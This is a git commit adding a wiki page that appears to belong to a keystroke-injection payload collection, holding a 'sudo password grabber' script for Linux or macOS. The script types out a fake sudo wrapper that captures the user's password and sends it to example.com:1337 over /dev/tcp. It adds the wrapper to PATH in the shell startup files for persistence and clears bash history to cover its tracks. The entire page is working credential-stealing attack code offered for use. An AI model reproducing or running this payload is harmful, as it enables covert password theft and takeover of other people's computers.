Created Linux or OSX - sudo password grabber (markdown)

2017-09-13 21:23:25 -07:00 · 2017-09-13 21:23:25 -07:00 · b8b2cbf590
parent 6acb991850
commit b8b2cbf590
1 changed files with 79 additions and 0 deletions
--- a/Linux-or-OSX---sudo-password-grabber.md
+++ b/Linux-or-OSX---sudo-password-grabber.md
@ -0,0 +1,79 @@
+Payload originally designed by oXis for Bash Bunny.
+
+Bash Bunny Payload page: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/SudoBackdoor
+
+```
+REM Original Author: oXis
+REM Original Payload for Bash Bunny: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/SudoBackdoor
+REM Modified by 5h@d0w
+DELAY 2000
+GUI space
+DELAY 500
+ALT F2
+DELAY 500
+BACKSPACE
+DELAY 100
+STRING terminal
+ENTER
+DELAY 3000
+STRING mkdir -p ~/.config/sudo
+ENTER
+DELAY 100
+STRING rm  ~/.config/sudo/sudo
+ENTER
+DELAY 100
+STRING echo '#!/bin/bash
+ENTER
+STRING /usr/bin/sudo -n true 2>/dev/null
+ENTER
+STRING if [ $? -eq 0 ]
+ENTER
+STRING then
+ENTER
+STRING /usr/bin/sudo $@
+ENTER
+STRING else
+ENTER
+STRING echo -n "[sudo] password for $USER: "
+ENTER
+STRING read -s pwd
+ENTER
+STRING echo
+ENTER
+STRING echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
+ENTER
+STRING if [ $? -eq 1 ]
+ENTER
+STRING then
+ENTER
+STRING echo "$USER:$pwd:invalid" > /dev/tcp/example.com/1337
+ENTER
+STRING echo "Sorry, try again."
+ENTER
+STRING sudo $@
+ENTER
+STRING else
+ENTER
+STRING echo "$USER:$pwd:valid" > /dev/tcp/example.com/1337
+ENTER
+STRING echo "$pwd" | /usr/bin/sudo -S $@
+ENTER
+STRING fi
+ENTER
+STRING fi' > ~/.config/sudo/sudo
+ENTER
+DELAY 600
+STRING chmod u+x ~/.config/sudo/sudo
+ENTER
+DELAY 800
+STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
+ENTER
+DELAY 500
+STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
+ENTER
+DELAY 500
+STRING history -c && rm .bash_history && exit
+ENTER
+DELAY 1000
+GUI q
+```